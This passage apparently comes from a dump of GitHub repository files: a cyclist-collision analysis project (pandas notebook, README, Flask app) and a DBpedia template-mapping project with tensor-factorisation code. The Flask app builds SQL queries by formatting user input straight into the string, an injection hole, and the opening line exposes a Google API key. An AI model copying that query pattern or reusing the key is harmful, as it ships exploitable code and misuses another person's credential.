'AIzaSyB0NpeNQgVuTxfHdkxw2lhl7WCvpWN6GXc'\n#}]\n#\n#results = google_streetview.api.results(params)\n#\n## Download images to directory 'downloads'\n#results.download_links('downloads')" }, { "alpha_fraction": 0.5385600924491882, "alphanum_fraction": 0.5757110118865967, "avg_line_length": 14.658634185791016, "blob_id": "b64dab3f2254c57e81b058e1dd2e7e6b92ba5a89", "content_id": "6dbe061acb23b5f52c4f92b51840ca92fe32d000", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3903, "license_type": "no_license", "max_line_length": 122, "num_lines": 249, "path": "/team64final/CODE/Scripts/model_data_segment_full_20191109.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ### This notebook shapes collision data to street segment level and compute all model features needed to the same level.\n\n# 1. Set-up\n\n# In[68]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import read_sql\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# In[69]:\n\n\npd.set_option('display.max_colwidth', -1)\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\n# 2. load data \n\n# In[106]:\n\n\n# main table with case-level collision record\ndf = pd.read_csv('transbase_collision.csv')\n\n# mapping table with traffic volume for each street segment\n# df_2 = pd.read_csv('st_sgmt_trnsprtn.csv')\n\n# strees_full\ndf_2 = pd.read_csv('streets_full.csv')\n\n\n# In[71]:\n\n\n# preview main table\n\ndf.head()\n\n\n# In[74]:\n\n\n# preview main table\n\ndf.describe()\n\n\n# In[75]:\n\n\n# select the cols we need\n\ndf_select = df[['case_id_pkey','cnn_sgmt_fkey', 'collision_severity']]\n\n\n# In[76]:\n\n\n# preview selected cols\n\ndf_select.head()\n\n\n# 3. Transform variables\n\n# In[ ]:\n\n\n# 3.1 collision_severity\n\n\n# In[77]:\n\n\ndf_select['collision_severity'].isnull().sum()\n\n\n# In[21]:\n\n\ndf_select['collision_severity'].value_counts()\n\n\n# In[78]:\n\n\n# mapping rule\n\n# Injury (Other Visible) 4\n# Injury (Complaint of Pain) 3\n# Injury (Severe) 2 \n# Fatal 1\n\n\n# In[79]:\n\n\n# convert!\n\ndf_select['cs_injury_4'] = np.where(df_select['collision_severity'] == 'Injury (Other Visible)', 1, 0)\ndf_select['cs_injury_3'] = np.where(df_select['collision_severity'] == 'Injury (Complaint of Pain)', 1, 0)\ndf_select['cs_injury_2'] = np.where(df_select['collision_severity'] == 'Injury (Injury (Severe))', 1, 0)\ndf_select['cs_injury_1'] = np.where(df_select['collision_severity'] == 'Injury (Fatal)', 1, 0)\n\n\n# In[91]:\n\n\n# roll up to segment key level\n\ndf_select_sgmt_level = df_select.groupby('cnn_sgmt_fkey').agg({'case_id_pkey':'size',\n 'cs_injury_4':'sum',\n 'cs_injury_3':'sum',\n 'cs_injury_2':'sum',\n 'cs_injury_1':'sum' \n }).reset_index()\n\n\n# In[93]:\n\n\n# change colume names\n\ndf_select_sgmt_level.rename(columns={'case_id_pkey': 'num_collisions', \n 'cs_injury_4': 'num_cases_injury_other_visible',\n 'cs_injury_3': 'num_cases_complaint_of_pain',\n 'cs_injury_2': 'num_cases_severe',\n 'cs_injury_1': 'num_cases_fatal'\n }, inplace=True)\n\n\n# In[97]:\n\n\ndf_select_sgmt_level.head()\n\n\n# In[98]:\n\n\n# no nulls\n\ndf_select_sgmt_level.isnull().sum()\n\n\n# 4. Merge df_select_sgmt_level table and the streets_full table\n\n# In[99]:\n\n\n# preview main table (filtered version)\n\ndf_select.head()\n\n\n# In[107]:\n\n\ndf_2.head()\n\n\n# In[108]:\n\n\n# check nulls for each column\n\ndf_2.isnull().sum()\n\n\n# In[86]:\n\n\n# daily_ride_qrt has 428 nulls\n# need to remove from y metric calculation because denominator cannot be null\n\n\n# In[109]:\n\n\ndf_2_select = df_2.copy()\n\n\n# In[115]:\n\n\n# merge using segment key\n\ndf_3 = df_select_sgmt_level.merge(df_2, left_on = 'cnn_sgmt_fkey', right_on = 'cnn_sgmt_pkey', how = 'inner')\n\n\n# In[116]:\n\n\ndf_3.head()\n\n\n# In[117]:\n\n\ndf_3.isnull().sum()\n\n\n# 5. compute y\n\n# In[119]:\n\n\n# Number of collision/daily_ride_qrt\n\ndf_3_notnull = df_3[df_3['daily_ride_qrt'].isnull() == False]\n\ndf_3_notnull['y'] = df_3_notnull['num_collisions'] * 1. / df_3_notnull['daily_ride_qrt']\n\n\n# In[120]:\n\n\ndf_3_notnull.head(20)\n\n\n# In[121]:\n\n\ndf_3_notnull.isnull().sum()\n\n\n# In[124]:\n\n\ndf_3_notnull['y'].describe()\n\n\n# In[126]:\n\n\ndf_3_notnull.to_csv('model_data_segment_full_20191109.csv', index = False)\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.6626213788986206, "alphanum_fraction": 0.6723300814628601, "avg_line_length": 33.29166793823242, "blob_id": "767258fb48053bea3b0f11fdc993cf20e1843a60", "content_id": "1244c9cb2b41e8f2b88c9e67346c03dbe867a168", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 824, "license_type": "no_license", "max_line_length": 87, "num_lines": 24, "path": "/README.md", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "# Group Project\n\n![SF_Map](sfmap.jpeg)\n\n1. Data\n <br/> &nbsp; A. download - GSV pictures\n <br/>&nbsp; B. data for models\n <br/> &nbsp; C. collision_download - GSV pictures for collision\n2. Database - original collision data\n3. GSV_API - Google street view code\n4. Image_detect - CNN and object detection\n5. Metric LR - References for our model\n6. Script - codes\n7. Viz - frontend\n Use python to set up local host\n <br/> &nbsp; A. static - store static data files\n <br/> &nbsp;&nbsp;&nbsp; css - css style\n <br/> &nbsp;&nbsp;&nbsp; res - all csv & GeoJSON files\n <br/> &nbsp; B. lib - library files\n <br/> &nbsp; index.html - Final html file\n <br/> &nbsp;readme.txt - setup draft for TA\n8. Archive - archived files\n\nNote: Please submit a **PULL REQUEST** when significant changes are to be made. Thanks!\n\n" }, { "alpha_fraction": 0.5927756428718567, "alphanum_fraction": 0.595817506313324, "avg_line_length": 28.233333587646484, "blob_id": "e4aa413b742511f734ee074452a3214e58dd6a10", "content_id": "40329f879df91a2f02a78350786189a30013a55e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2630, "license_type": "no_license", "max_line_length": 75, "num_lines": 90, "path": "/Archive/app.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,request,g, url_for\nimport pandas as pd\nimport sqlite3\nimport os\n\nDATABASE = \"./collision.db\"\n\n#Create app\napp = Flask(__name__)\n\n#__file__ refers to current module\nROOT = os.path.dirname(os.path.abspath(__file__))\nSTATIC = os.path.join(ROOT, 'static')\nRES = os.path.join(STATIC, 'res')\n\n#connect to database\ndef get_db():\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\[email protected]_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\[email protected](\"/\")\ndef index():\n #index.html MUST be inside ./templates\n return render_template(\"index.html\")\n\n#filter function\ndef multiple_filter(user_input):\n '''input: user_input - a list of strings: user's selection\n e.g., user_input = [day, weather] and day = Wednesday, weather = Cloudy\n return: requested SQL statement\n Currently the code ONLY TEST TWO COLUMNS'''\n \n col_name = [\"day_of_week\", \"weather_1\"]\n #check if users selected anything\n var = list(set(user_input))\n \n #if not, return all collision cases\n if len(var) == 1 and var[0] == \"All\":\n query = \"SELECT * FROM collision\"\n #if yes, return selected ones\n else:\n query = 'SELECT * FROM collision WHERE '\n count = 0\n for i, c in enumerate(user_input):\n if c != \"All\":\n count += 1\n v = col_name[i]\n if count > 1:\n c_filter = ' AND {} = \"{}\"'.format(v, c)\n query += c_filter\n else:\n c_filter = '{} = \"{}\"'.format(v, c)\n query += c_filter\n return query\n\n\n#query from user input\[email protected]('/query_user', methods=['GET', 'POST'])\ndef query_user():\n '''Proposed logic:\n request function get selected category from users' selection \n and save it as a string into day variable, it then \n gets into multi_filter to produce a sql query. \n Likewise, all other variables are feed into the sql query \n to produce filtered csv.\n csv is then output to current path to be used by html file to\n show collision data detail'''\n \n day = request.form['day']\n weather = request.form['weather']\n a = [day, weather]\n print(a)\n db = get_db()\n query = multiple_filter(a)\n filtered_df = pd.read_sql_query(query, db)\n \n csv_path = os.path.join(RES, 'output.csv')\n print(\"csv_path - \",csv_path)\n filtered_df.to_csv(csv_path,index=False)\n \n return render_template(\"index.html\")\n \nif __name__ == \"__main__\":\n app.run()" } ]
12
Harrison-Brown/Qolygen
https://github.com/Harrison-Brown/Qolygen
a912567a33aa6988c3a6e1d572b29c31918c429c
61cb35c183fa3759af4e055d920e123d356c9595
c63de2a85e465c4d407e8bf0a16e8083b11d4907
refs/heads/main
2023-04-15T22:38:10.793548
2021-04-28T20:23:01
2021-04-28T20:23:01
362,596,168
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7992125749588013, "alphanum_fraction": 0.7992125749588013, "avg_line_length": 126, "blob_id": "22f05b4f7df145d21eea89497b05596d324d76a0", "content_id": "be5250d13434ec81bc79902d33308b727aa41b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 254, "license_type": "no_license", "max_line_length": 243, "num_lines": 2, "path": "/README.md", "repo_name": "Harrison-Brown/Qolygen", "src_encoding": "UTF-8", "text": "# Qolygen\nSimple script that generates a polynomial that passes through points. Instead of using decimals, it uses fractional coefficients. Edit the points in `main()` within `qolygen.py`, and it'll output the polynomial that passes through said points.\n" }, { "alpha_fraction": 0.4339887499809265, "alphanum_fraction": 0.4606741666793823, "avg_line_length": 23.428571701049805, "blob_id": "c26b7b67697e39280da1a6ca095e3431a7425d9c", "content_id": "47597893413131dd6011848f3679a5dd8c2caf50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 49, "num_lines": 28, "path": "/Qolygen.py", "repo_name": "Harrison-Brown/Qolygen", "src_encoding": "UTF-8", "text": "from Qolynomial import *\r\n\r\ndef Qolygen(points):\r\n result = Qolynomial(0)\r\n for i in range(len(points)):\r\n point = points.pop(i)\r\n q = Qolynomial(1)\r\n d = 1\r\n for p in points:\r\n q *= Qolynomial(-p[0], 1)\r\n d *= (point[0] - p[0])\r\n q *= Qolynomial(Q(point[1], d))\r\n result += q\r\n points.insert(i, point)\r\n return result\r\n\r\ndef main():\r\n points = [(2, 3), (10, 3), (-2, 1), (7, 6)]\r\n print('Points given:')\r\n print(points)\r\n q = Qolygen(points)\r\n print('Function found:')\r\n print('f(x) = ' + str(q))\r\n for p in points:\r\n print('f({}) = {}'.format(p[0], q(p[0])))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" }, { "alpha_fraction": 0.42971333861351013, "alphanum_fraction": 0.43825799226760864, "avg_line_length": 26.793651580810547, "blob_id": "3f4496168653929fe149dfa635508cbe11214ac3", "content_id": "5ffcab8085d3483adb1d8f903580c17b70c6a909", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3628, "license_type": "no_license", "max_line_length": 74, "num_lines": 126, "path": "/Qolynomial.py", "repo_name": "Harrison-Brown/Qolygen", "src_encoding": "UTF-8", "text": "class Q:\r\n def __init__(self, n, d = 1):\r\n self.n = n\r\n if n == 0:\r\n d = 1\r\n self.d = d\r\n self.reduce()\r\n\r\n def __add__(self, other):\r\n n = (self.n * other.d) + (self.d * other.n)\r\n d = self.d * other.d\r\n return Q(n, d)\r\n\r\n def __sub__(self, other):\r\n other.n = -other.n\r\n return self + other\r\n\r\n def __mul__(self, other):\r\n n = self.n * other.n\r\n d = self.d * other.d\r\n return Q(n, d)\r\n\r\n def __pow__(self, power):\r\n return Q(self.n**power, self.d**power)\r\n\r\n def __truediv__(self, other):\r\n other.n, other.d = other.d, other.n\r\n return self * other\r\n\r\n def reduce(self):\r\n if self.d < 0:\r\n self.d *= -1\r\n self.n *= -1\r\n a = max(self.n, self.d)\r\n b = min(self.n, self.d)\r\n while b:\r\n a, b = b, a % b\r\n a = abs(a)\r\n self.n = self.n // a\r\n self.d = self.d // a\r\n\r\n def __repr__(self):\r\n if self.d == 1:\r\n return 'Q({})'.format(self.n)\r\n else:\r\n return 'Q({}, {})'.format(self.n, self.d)\r\n\r\n def __str__(self):\r\n if self.d == 1:\r\n return '{}'.format(self.n)\r\n else:\r\n return '{}/{}'.format(self.n, self.d)\r\n\r\n def __eq__(self, other):\r\n if self.n == other.n and self.d == other.d:\r\n return True\r\n else:\r\n return False\r\n\r\nclass Qolynomial():\r\n def __init__(self, *coeffs):\r\n if coeffs == ():\r\n coeffs = [0]\r\n self.coeffs = list(coeffs)\r\n for i in range(len(self.coeffs)):\r\n if type(self.coeffs[i]) is int:\r\n self.coeffs[i] = Q(self.coeffs[i])\r\n self.unpad()\r\n self.degree = len(self.coeffs) - 1\r\n\r\n def unpad(self):\r\n if self.coeffs[-1] == Q(0) and len(self.coeffs) > 1:\r\n self.coeffs.pop(-1)\r\n self.unpad()\r\n\r\n\r\n def __call__(self, x):\r\n if type(x) is int:\r\n x = Q(x)\r\n l = self.coeffs.copy()\r\n while len(l) > 1:\r\n a = l.pop(-1)\r\n l[-1] += a * x\r\n return l[0]\r\n\r\n def __repr__(self):\r\n return \"Qolynomial{}\".format(tuple(self.coeffs))\r\n\r\n def __str__(self):\r\n if self.degree == 0:\r\n return str(self.coeffs[0])\r\n elif self.degree == 1:\r\n return str(self.coeffs[0]) + ' + ' + str(self.coeffs[1]) + 'x'\r\n else:\r\n s = str(self.coeffs[0]) + ' + ' + str(self.coeffs[1]) + 'x'\r\n for i in range(2, self.degree + 1):\r\n s += ' + ' + str(self.coeffs[i]) + 'x^' + str(i)\r\n return s\r\n\r\n def __add__(self, other):\r\n if self.degree < other.degree:\r\n larger = other.coeffs.copy()\r\n smaller = self.coeffs.copy()\r\n else:\r\n larger = self.coeffs.copy()\r\n smaller = other.coeffs.copy()\r\n for i in range(len(smaller)):\r\n larger[i] += smaller[i]\r\n return Qolynomial(*larger)\r\n\r\n def __sub__(self, other):\r\n l = [-1 * x for x in other.coeffs]\r\n return self + Qolynomial(*l)\r\n\r\n def __mul__(self, other):\r\n l = [Q(0) for x in range(self.degree + other.degree + 1)]\r\n for i in range(len(self.coeffs)):\r\n for j in range(len(other.coeffs)):\r\n l[i + j] += self.coeffs[i] * other.coeffs[j]\r\n return Qolynomial(*l)\r\n\r\n def __pow__(self, power):\r\n q = Qolynomial(*self.coeffs.copy())\r\n for i in range(power -1):\r\n q *= Qolynomial(*self.coeffs.copy())\r\n return q\r\n" } ]
3
afcarl/mappings-autogeneration
https://github.com/afcarl/mappings-autogeneration
633bca3aab228c77a3c974adfd266faa498bd014
c05e4fa1c6f02bc2341e1dd9ad1d5d4febc86bbf
b03a7647d9a1a4adca06d4656ac9f69f97607ac8
refs/heads/master
2020-03-17T23:55:33.601096
2016-08-09T03:54:49
2016-08-09T03:54:49
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7064017653465271, "alphanum_fraction": 0.7461368441581726, "avg_line_length": 49.33333206176758, "blob_id": "efa75bd22309e16d9c307e101d795d077d3b51c2", "content_id": "d980e365fa19c569ae952fc33b63fbf61875778b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 453, "license_type": "permissive", "max_line_length": 111, "num_lines": 9, "path": "/Data/README.md", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# directory to store the data\n\n### Data Source\n\n- ***Existing Mapping***: http://mappings.dbpedia.org/server/mappings/en/pages/rdf/all \n- ***Article Template Links***: http://downloads.dbpedia.org/2015-10/core-i18n/en/article_templates_en.ttl.bz2 \n- ***Interlanguage Links***: http://downloads.dbpedia.org/2015-10/core-i18n/en/interlanguage_links_en.ttl.bz2\n\nThe above links are datasets in English, replace \"en\" to obtain datasets for other languages.\n" }, { "alpha_fraction": 0.6655573844909668, "alphanum_fraction": 0.6747088432312012, "avg_line_length": 31.707483291625977, "blob_id": "1280913c2440cbf2befcda036caa0931f3c26b5b", "content_id": "21bef5a2ed8a795103807ba9bc5ed3cf91fa5825", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4808, "license_type": "permissive", "max_line_length": 120, "num_lines": 147, "path": "/Code/factorization.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.sparse as spsp\nimport pandas as pd\nfrom rescal import rescal_als\nimport config\nfrom optparse import OptionParser\nfrom utils import time_utils, pkl_utils\nimport os\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n_log = logging.getLogger('RESCAL')\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"en\", type=\"string\", dest=\"lang\", help=\"specify the language\")\n\tparser.add_option(\"-p\", \"--parse\", default=False, action=\"store_true\", dest=\"parse\", help=\"enable the parsing module\")\n\tparser.add_option(\"-t\", \"--train\", default=False, action=\"store_true\", dest=\"train\", help=\"enable the training module\")\n\tparser.add_option(\"-r\", \"--rank\", default=10, type=\"int\", dest=\"r\", help=\"specify the rank\")\n\tparser.add_option(\"-i\", \"--iteration\", default=10, type=\"int\", dest=\"i\", help=\"specify the number of iteration\")\n\tparser.add_option(\"--fin\", type=\"string\", dest=\"fin\", help=\"the path of input file\")\n\tparser.add_option(\"--fout\", type=\"string\", dest=\"fout\", help=\"the path of output file\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef parse(lang=\"en\"):\n\t_log.info(\"starting parsing\")\n\tinfile = open(config.INSTANCE_TYPES[lang])\n\trdf_type = \"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"\n\ttype_entries = []\n\tentitySet = set()\n\ttypeSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tinstance = row[0][1:-1]\n\t\tontology = row[2][1:-1]\n\t\ttype_entries.append((instance, ontology))\n\t\tentitySet.add(ontology)\n\t\ttypeSet.add(ontology)\n\ttypeDict = {y:x for x, y in enumerate(typeSet)}\n\tinfile.close()\n\n\tcnt_type = len(entitySet)\n\t_log.info(\"%d types\" % cnt_type)\n\n\tinfile = open(config.OBJECTS[lang])\n\trelationDict = {}\n\tinstanceSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tsubject = row[0][1:-1]\n\t\tpredicate = row[1][1:-1]\n\t\ttarget = row[2][1:-1]\n\t\tentitySet.add(subject)\n\t\tentitySet.add(target)\n\t\tinstanceSet.add(subject)\n\t\tinstanceSet.add(target)\n\t\tif predicate in relationDict:\n\t\t\trelationDict[predicate].append((subject, target))\n\t\telse:\n\t\t\trelationDict[predicate] = [(subject, target)]\n\tinstanceDict = {y:x for x, y in enumerate(instanceSet)}\n\tentityDict = {y:x for x, y in enumerate(entitySet)}\n\tinfile.close()\n\n\tcnt_ins = len(instanceSet)\n\tN = len(entitySet)\n\t_log.info(\"%d instanes\" % cnt_ins)\n\t_log.info(\"%d entites\" % N)\n\t\n\ttensor = []\n\tpredicateDict = {}\n\tcnt = 0\n\tfor predicate in relationDict:\n\t\tentries = relationDict[predicate]\n\t\trows = [entityDict[entry[0]] for entry in entries]\n\t\tcols = [entityDict[entry[1]] for entry in entries]\n\t\tdata = [1 for entry in entries]\n\t\tmat = spsp.csr_matrix((data, (rows, cols)), (N, N))\n\t\ttensor.append(mat)\n\t\tpredicateDict[predicate] = cnt\n\t\tcnt += 1\n\ttype_entries = [entry for entry in type_entries if entry[0] in instanceSet]\n\trows = [entityDict[entry[0]] for entry in type_entries]\n\tcols = [entityDict[entry[1]] for entry in type_entries]\n\tdata = [1 for entry in type_entries]\n\tmat = spsp.csr_matrix((data, (rows, cols)), (N, N))\n\ttensor.append(mat)\n\tpredicateDict[rdf_type] = cnt\n\t_log.info(\"%d relations\" % (cnt+1))\n\tpkl_utils._save(config.TENSOR[lang], tensor)\n\tpkl_utils._save(config.ENTITY[lang], entityDict)\n\tpkl_utils._save(config.PREDICATE[lang], predicateDict)\n\tpkl_utils._save(config.INSTANCE[lang], instanceDict)\n\tpkl_utils._save(config.TYPE[lang], typeDict)\n\tpkl_utils._save(config.TYPE_MATRIX[lang], (rows, cols))\n\t_log.info(\"parsing complete\")\n\ndef tensor_factorization(lang, r, n_iter):\n\t_log.info(\"start factorization\")\n\tX = pkl_utils._load(config.TENSOR[lang])\n\t_log.info(\"data loading complete\")\n\tA, R, _, _, _ = rescal_als(X, r, maxIter=n_iter, lambda_A=10, lambda_R=10, compute_fit=False)\n\tdata_output = {'A':A, 'R':R}\n\tpkl_utils._save(config.RESCAL_OUTPUT[lang], data_output)\n\t_log.info(\"factorization complete\")\n\ndef compute_scores(A, R, ss, ps, os):\n\treturn np.array([\n\t\tnp.dot(A[ss[i], :], np.dot(R[ps[i]], A[os[i], :].T))\n\t\tfor i in range(len(ss))\n\t])\n\ndef main(options):\n\tlang = options.lang\n\tfin = options.fin\n\tfout = options.fout\n\tp = options.parse\n\tt = options.train\n\tr = options.r\n\tn_iter = options.i\n\n\tif p:\n\t\tparse(lang)\n\tif t:\n\t\ttensor_factorization(lang, r, n_iter)\n\t\n\tentityDict = pkl_utils._load(config.ENTITY[lang])\n\tpredicateDict = pkl_utils._load(config.PREDICATE[lang])\n\ttf = pkl_utils._load(config.RESCAL_OUTPUT[lang])\n\tA = tf[\"A\"]\n\tR = tf[\"R\"]\n\tdf = pd.read_csv(fin, names=[\"s\", \"p\", \"o\"])\n\tdf[\"s\"] = df[\"s\"].map(entityDict)\n\tdf[\"p\"] = df[\"p\"].map(predicateDict)\n\tdf[\"o\"] = df[\"o\"].map(entityDict)\n\tscores = compute_scores(A, R, list(df[\"s\"]), list(df[\"p\"]), list(df[\"o\"]))\n\tpd.DataFrame(scores).to_csv(fout, index=False, header=False)\n\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.664893627166748, "avg_line_length": 19.88888931274414, "blob_id": "d43a4050bf06fb4e372ec3d440c0828fe9c080da", "content_id": "77934a987cd667339df4659f59d3d0c4c4cdeee0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "permissive", "max_line_length": 36, "num_lines": 9, "path": "/Code/utils/pkl_utils.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import pickle\n\ndef _save(fname, data, protocal=-1):\n\twith open(fname, \"wb\") as f:\n\t\tpickle.dump(data, f, protocal)\n\ndef _load(fname):\n\twith open(fname, \"rb\") as f:\n\t\treturn pickle.load(f)\n" }, { "alpha_fraction": 0.7506293058395386, "alphanum_fraction": 0.7573418617248535, "avg_line_length": 64.48351287841797, "blob_id": "54ccf1a947b183a3f5f5e5503dda9c7fb887542e", "content_id": "d197518f85880ed0091b9ebc32cd3386cd92c9e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5959, "license_type": "permissive", "max_line_length": 404, "num_lines": 91, "path": "/README.md", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# mappings-autogeneration\n\n### Template Mapping\n\nGiven a Wikipedia template, our goal is to map it to a DBpedia ontology class when possible. The approach is instance-based: exploit the Wikipedia pages (instances) already mapped with a DBpedia class and their cross language links to the pages that the template to be mapped. A simple method based on the frequencies of the resulting classes allows us to tune the tradeoff between precision and recall. \n\n![Alt](/Images/figure1.png)\n\nThe mapping algorithm is summaried in the above figure and implemented as follows:\n\n- Given as input infobox taken from a version of Wikipedia in a specific language, we collect all the page that include this infobox.\n- Use the cross-language links to retrieve the pages in the selected pivot languages, for which we know the DBpedia classes.\n- Collect the DBpedia classes of these pages and count their number of occurrences.\n- The input infobox is then mapped to the most frequent class. A parameter **L** between 0 and 1 is used to filter the class whose frequency is less than **L**. In addition, we ignore the infox whose occurrence **C** is too small, like less than **C** = 10.\n\n### Use Information from Wikidata \n\nQuite a bit entities in wikidata has a DBpedia ontology types assigned already. In addition, we have links between wikidata and other languages. As a result, we can treat wikidata as a pivot language directly. The information from wikidata can be useful to improve the performance of our approach. \n\n### Class Assignment\n\nDBpedia stores the cross-language information, but it's not used to map the infoboxes. For example, Clint Eastwood is classified as **Actor** in the French and as **Person** in the Italian one. As a result, we need to find a strategy to classify pages in all languages to the most specific class. The strategy is defined as follows:\n\n- If the page belongs to more than one ontology class, the lowest common ancestor of these classes is assigned.\n- In the above case, if the classes are connected in a chain of subclass of relations, we consider the most specific class.\n\n### Source Code and Usage\n\nThe source codes are all stored in the **Code** directory.\n\n- ```config.py``` defines the paths and parameters in the program. Modify it to fit your own environment if necessary.\n- ```download.py``` can download the needed datasets for a specified language.\n- ```parse.py``` transforms the given data into the entity matrix, given the target language and the pivot language, see **Example** for details.\n- ```predict.py``` gives predicted mapping for the target language based on the given pivot languaes. With option \"-e\", it can also calculate the precision and recall of the target language based on the existing mapping on DBpedia.\n- ```workflow.py``` combine all the above modules together. You can simply run this script to conduct the whole workflow including download, parse, predict and evaluate. \n\n### Example\n\nAfter use ```parse.py```, we can get a matrix as follows for the given target language and pivot language:\n\ntemplate_zh | article_zh | template_en | article_en | class\n:---------: | :--------: | :---------: | :--------: | :---:|\nAuthority_control | Slackware | Infobox_OS | Slackware | Software \nAuthority_control | OpenSUSE | Authority_control | OpenSUSE | owl#Thing\nAuthority_control | FreeBSD | Infobox_OS | FreeBSD | Software\n\n### Experiments\n\nIn the experiments, we exploits existing handcrafted mappings in six languages (English, Italian, German, Portuguese, Spanish, French). Experiments have benn carried out on 5 languages (Bulgarian, Czech, Indonesian, Dutch and Catalan).\n\nPrecision and recall values are calculated using existing mappings from DBpedia official mapping website as gold standard.\n\nFor Bulgarian, we have the following results (The results are stored in these files: [data_without_wikidata](/Plot/data_without_wikidata.csv) and [data_with_wikidata](/Plot/data_with_wikidata.csv))\n\n![Alt](/Plot/figure1.png)\n\n### Case Study\n\nWhen **L** is 0.5, **C** is 10, there are five miss classified cases in Bulgarian:\n\nlabel | predict | LCA\n:---- | :------ | :--\nFilm | Actor | owl#Thing\nPlace | AdministrativeRegion | Place\nPerson | Writer | Person\nSettlement | Village | Settlement\nFormulaOneRacing | GrandPrix | owl#Thing\n\nFrom which, we can find that there are 3 out of 5 cases that the predicted class is a subclass of the labeled class. In the current evaluation metric, we treat them as false positives which is not that accurate. As a result, we'd better propose a better evaluation metric.\n\n### High-quality Output Mappings for Chinese\n\nSetting **L** as 0.9 and **C** as 100, I get 501 mappings for Chinese. After manual checking, I filter out 456 high-quality mappings as output of the project, which can be found in [this file](/Output/predicted/zh.csv). \n\n### Tensor Factorization on DBpedia\n\n![Alt](/Images/RESCAL.png)\n\nUsing ideas in [Factorizing YAGO](http://www.dbs.ifi.lmu.de/~tresp/papers/p271.pdf), the script ```factorization.py``` can compute a score for given triples indicating the likelihood of the existance of the triples.\n\nGiven input like [this file](/Code/input.csv), we can get an output like [this file](/Code/output.csv). We can use the score to help determine whether to add some triples to DBpedia.\n\nIn order to use this script, the package [RESCAL](https://github.com/mnick/rescal.py) needs to be installed first.\n\n### Graph Embeddings on DBpedia\n\n![Alt](/Images/HOLE.png)\n\nUsing ideas in [Holographic Embeddings of Knowledge Graphs](http://arxiv.org/pdf/1510.04935.pdf) and [Translating Embeddings for Modeling Multi-relational Data](http://papers.nips.cc/paper/5071-translating-embeddings-for-modeling-multi-relational-data.pdf), the script ```hole.py``` can compute a score for given triples just like ```factorization.py``` mentioned above.\n\nIn order to use this script, the package [scikit-kge](https://github.com/mnick/scikit-kge) needs to be installed first.\n" }, { "alpha_fraction": 0.6447368264198303, "alphanum_fraction": 0.6866028904914856, "avg_line_length": 29.962963104248047, "blob_id": "3871b7ca7bde935eb3d146ec2e38d40d6862533f", "content_id": "fc13c04a3dc1f74f62a4781718469347c82f9cfb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "permissive", "max_line_length": 76, "num_lines": 27, "path": "/Plot/plot.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport pandas as pd\n\nd1 = pd.read_csv(\"data_without_wikidata.csv\")\nd2 = pd.read_csv(\"data_with_wikidata.csv\")\n\ngrid_size = (2, 1)\nplt.subplot2grid(grid_size, (0, 0), rowspan=1, colspan=1)\nplt.plot(d1[\"L\"], d1[\"precision\"], marker=\"o\", label=\"without wikidata\")\nplt.plot(d2[\"L\"], d2[\"precision\"], marker=\"o\", label=\"with wikidata\")\nplt.ylabel('Precision')\nplt.xlim(0.1, 0.9)\nplt.grid(True)\nplt.legend(loc=2)\n\nplt.subplot2grid(grid_size, (1, 0), rowspan=1, colspan=1)\nplt.plot(d1[\"L\"], d1[\"recall\"], marker=\"o\", label=\"without wikidata\")\nplt.plot(d2[\"L\"], d2[\"recall\"], marker=\"o\", label=\"with wikidata\")\nplt.ylabel('Recall')\nplt.xlabel('L')\nplt.xlim(0.1, 0.9)\nplt.grid(True)\nplt.legend()\n\nplt.suptitle(\"Performance on bulgarian given 6 pivot languages with C = 10\")\n#plt.show()\nplt.savefig('figure1.png')\n" }, { "alpha_fraction": 0.6483292579650879, 